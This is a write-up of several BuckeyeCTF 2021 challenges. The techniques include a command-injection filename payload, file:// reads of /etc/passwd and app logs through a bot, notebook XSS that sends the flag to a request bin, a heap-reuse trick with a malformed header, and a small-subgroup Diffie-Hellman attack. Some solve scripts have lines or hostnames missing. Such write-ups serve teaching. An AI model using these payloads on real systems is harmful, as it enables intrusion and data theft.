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BuckeyeCTF 2021 Writeups

I played in BuckeyeCTF as part of b01lers. A big thank you to the organizers for a fun weekend!

Table of Contents


Neurotic (33 solves, medium)

Challenge description

I’m sure neural nets are great for encryption!

Attached files:, model.pth


tl;dr: math

The neural network is taking in the flag, performing some calculations, and outputting some data. How can we invert the process?

With Google, of course!

This StackOverflow question was extremely helpful in solving the challenge. As it turns out, we can use the same approach here: same number of input and output neurons, and the activation function is invertible.

While copying the code from StackOverflow, I was quite confused as to why the list returned by model.stack.children() was only one long. It took me a few minutes to realize that in the NeuralNetwork constructor, multiplying the list by 7 means that each layer refers to the same object. Therefore, we can multiply the list by 7 while going in reverse, and we don’t care about order anymore since every object is the same.

Solve script:

import torch
from torch import nn
import numpy as np
from functools import reduce
import base64

class NeuralNetwork(nn.Module):
    def __init__(self):
        super(NeuralNetwork, self).__init__()
        self.stack = nn.Sequential(*([nn.Linear(8, 8, bias=False)] * 7))

    def forward(self, x):
        x = self.stack(x)
        return x

device = "cuda" if torch.cuda.is_available() else "cpu"

model = NeuralNetwork().to(device)

out = '1VfgPsBNALxwfdW9yUmwPpnI075HhKg9bD5gPDLvjL026ho/xEpQvU5D4L3mOso+KGS7vvpT5T0FeN284inWPXyjaj7oZgI8I7q5vTWhOj7yFEq+TtmsPaYN7jxytdC9cIGwPti6ALw28Pm9eFZ/PkVBV75iV/U9NoP4PDoFn72+rI8+HHZivMwJvr2s5IQ+nASFvhoW2j1+uHE98MbuvdSNsT4kzrK82BGLvRrikz6oU66+oCGCPajDmzyg7Q69OjiDPvQtnjxwWw2+IB9ZPmaCLb4Mwhc+LimEPXXBQL75OQ8/ulQUvZZMsr3iO88+ZHz3viUgLT2U/d68C2xYPQ=='

y = np.frombuffer(base64.b64decode(out), dtype=np.float32).reshape((8, 8)).copy()
z = torch.from_numpy(y)

for step in list(model.stack.children()) * 7:
    # z = z - step.bias[None, ...] (no bias for us)
    z = z[..., None]  # 'torch.solve' requires N column vectors (i.e. shape (N, n, 1)).
    z = torch.linalg.solve(step.weight, z)
    z = torch.squeeze(z)  # remove the extra dimension that we've added for 'torch.solve'.

vals = z.detach().numpy().reshape(64)
print(''.join(chr(round(x)) for x in vals))

Flag: buckeye{w41t_1ts_4ll_m4tr1x_mult1pl1cat10n????_4lwy4y5_h4s_b33n}


Tesseract (60 solves, easy)

Challenge description

Check out our OCR-as-a-service!



tl;dr: Shell command injection

Looking through the source, we see a command injection vulnerability.

Vulnerability in the code

The key aspect is the shell=True argument. The subprocess docs make a note of this potential vulnerability.

As a result, we can upload a file with the name ' || cat flag.txt && ' to get the flag. The code will run tesseract '' || cat flag.txt && '' || cat flag.txt && '' -l eng, which will have a non-zero return code and display the output.

Successful command injection output

Flag: buckeye{5an1t1ze_y0ur_c0mm4nds_or_just_d0nt_use_c0mm4nds_1n_th3_f1r5t_p1ac3}

StegBot (54 solves, easy)

Challenge description

Everybody loves steghide, so I made StegBot#2632 so that you can use it from Discord! Make sure to join our Discord server if you haven’t already, and DM /info to StegBot to get started.


tl;dr: file:// protocol

StegBot accepts three different commands: /info, /embed, and /extract.

Sending the /info command to StegBot gives us a link to its source code:

/embed takes in an image_url, and two optional arguments: message and password. Interestingly, if message is not supplied, the bot will give you back the image you sent it. This might be useful later.

/extract takes in two arguments: image_url and password. It calls steghide to extract the data embedded in an image.

Where is the flag? Before the bot starts, stegEmbed is called on bof.jpg located on the server, with the flag as the message a randomly generated password. We’ll need to find the location on the server where the new image is stored and what the password was.

Looking more closely, we see a suspicious function:

downloadFile function

downloadFile is called by /embed and /extract to download the images from the given URLs. curl can actually copy files for us by using the file:// protocol: curl file://<absolute_filepath> -o <output>. We can abuse this to have the bot give us a file on the server.

Let’s test by sending StegBot /embed image_url:file:///etc/passwd. No message is given so StegBot gives us back the “image” it “downloads”.

StegBot response

Opening the file gives us the contents of /etc/passwd. We’re in.

Another two suspicious lines:

logger instantiation

logging passwords

logger nicely logs all images, outputs, and passwords passed into stegEmbed! We can use this to find the location of the image where the flag is embedded as well as the password used. Let’s use our file access trick from earlier to get the contents of /app/app.log (/embed image_url: file:///app/app.log).


Bingo. Finish this off by extracting the flag from the image: /extract image_url: file:///tmp/images/bd15e11499c9abf6dc94c22025824ca5.jpg password: 389c08e3094e41c3022d55ee7c25aa8b

stegbot flag output

Flag: buckeye{d0wnl0ad1ng_f1l3s_fr0m_n0d3_w4s_t00_h4rd_s0_1_ju5t_u53d_curl}

Jupyter (16 solves, medium)

Challenge description

Upload a Jupyter notebook and the admin bot will take a look at it :)


Note: Try to be gentle with the server



tl;dr: XSS in a Jupyter notebook cell

upload notebook button

The premise is pretty simple: you upload a Jupyter notebook, and the admin will open it.

Has anyone wanted to auto-run code in a Jupyter notebook on open? A quick Google search later, the answer is yes. StackOverflow saves the day again.

The comments mention that the notebook needs to be “trusted,” whatever that means. Is that going to be a problem for us?

upload_ipynb function

(line 24) Turns out not.

It’s now just a matter of piecing together the auto-run all cells answer and some code that POSTs the contents of some command to a request bin.

auto-run code in a jupyter notebook

Digging around, we can find the location of the flag and send that to our request bin.

request bin result

Flag: buckeye{JUp1t3r_n0t3b0ok_funNy_bu51n3sS}

Curly fries (8 solves, medium)

Challenge description

It’s curl as a service

nc 13372



tl;dr: Incorrect Content-Length header detection, heap data re-use

Once we connect to the server, we’re prompted for a URL for it to curl. Afterwards, the server gives us the response headers as well as its contents.

Taking a look at the source, there are a few interesting finds. Before the URL is fetched, a verify_flag_file function is run that mallocs a 1024-byte buffer and reads the flag into it. It checks that the read-in flag starts with the correct string and finally frees the buffer.

curly_fries uses libcurl to fetch the headers and the response data of a URL. Upon receiving a Content-Length header, a buffer of the right size is allocated to hold the response data. After all data is received, the contents of the response buffer is printed out with puts.

header_callback function

The Content-Length header checks at line 26/27 are incorrect. If we send a header field such as Content-Lengthw: 1023, the allocation of a 1024-byte buffer for response will occur, but curl won’t recognize this as a valid Content-Length header so it won’t error if we don’t send enough data.

malloc should now give us back the buffer that contained the flag contents that were read from verify_flag_file(), and it won’t be overwritten by our response! But can we output this?

According to the curl docs for the write callback, the data given to it is not null-terminated. This is perfect as the null-termination for the buffer before printing done by curly_fries is only at the end of response_buf, which it thinks is 1024 bytes long.

Lastly, the first 16 bytes in the response buffer will be null bytes as malloc internally uses two pointers at the start of each free chunk to keep track of them. We will need to send 16 characters in our response to zero these out.

Putting all of this together, we get the solve script:

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.bind(('', 6969))

conn, addr = s.accept()
print('Accepted connection.')
with conn:
    data = b''
    while not data.endswith(b'\r\n\r\n'):
        data += conn.recv(1)


        b'HTTP/1.1 200 OK\r\n'
        b'Content-Lengthw: 1023\r\n'
        b'\r\n' + b'a'*16


And giving a URL pointing to this script to curly_fries gets us our flag.

curly_fries solve

Flag: buckeye{}


Key exchange 2 (34 solves, easy)

Challenge description

No public key this time!

nc 13386



tl;dr: small subgroup attack

We’re performing Diffie Hellman key exchange. However, we’re not given A’s public key! Can we still figure out the shared secret?

For a basic primer on DHKE and the math behind it, take a look at the Wikipedia page.

The major problem is that we don’t know AA anymore. Let’s take a look at what we have control over and see if we can use some trick to find the shared secret.

Alice is calculating the shared secret using the equation s=Bamodps=B^a \mod p. pp is given to us and we also have control over BB as we’re playing the role of Bob. Is there any way to set BB in some way (according to the code, BB must be between 22 and p2p-2) to be able to find value of ss given an arbitrary a[2,p1)a \in [2, p-1)?

Not exactly, but we can get close.

Concrete examples

Let p=31p=31. If we set B=25B=25, what possible values for ss do we have?

B2=625,  6255modpB^2 = 625,\; 625 \equiv 5 \mod p

B3=15625,  156251modpB^3 =15625,\; 15625 \equiv 1 \mod p

B4=390625,  39062525modpB^4=390625,\; 390625 \equiv 25 \mod p

B5=9765625,  97656255modpB^5=9765625,\; 9765625 \equiv 5 \mod p

Hold on, we’ve looped back around! If you continue for the possible values of pp, you’ll se that ss can only have three possible values: 5, 1, and 25. If we can constrain our ss to only have a few possible values, then that means we can try all of them to see which one work to decrypt the ciphertext.

Solve script:

import hashlib
import Crypto.Util.number as cun
from Crypto.Cipher import AES
import binascii
import sys
from pwn import *

r = remote('', 13386)
r.recvuntil('p = ')
p = int(r.recvlineS().strip())
print(f'p = {p}')

r.recvuntil('public key B: ')

# Z_p^* has a subgroup of order d for each divisor d of p-1
# we want a small order, so choose the smallest divisor of p - 1 greater than 2
for i in range(3, 100000):
    if (p - 1) % i == 0:
        order = i
    print('Failed, no groups with order < 100000')

print(f'Found subgroup of order {order}')

# now, find a generator of this subgroup
for y in range(1, 50):
    g = pow(y, (p-1)//order, p)
    if g != 1 and g != p-1:
    print('Failed to find generator')

print(f'Found generator: {g}')

# g is a generator for our small subgroup, so send g as B's public key so we can brute
# force the shared secret.

r.recvuntil(b'ciphertext = ')
ciphertext = binascii.unhexlify(r.recvlineS().strip())

for i in range(1, order + 1):
    shared_secret = pow(g, i, p)

    key = hashlib.sha1(cun.long_to_bytes(shared_secret)).digest()[:16]
    cipher =, AES.MODE_ECB)
    plaintext = cipher.decrypt(ciphertext)

    if plaintext.startswith(b'buckeye'):
    print("Couldn't find flag.")

output of solve script

Flag: buckeye{sup3r_dup3r_t1ny_m1cr0sc0p1c_subgr0up5!}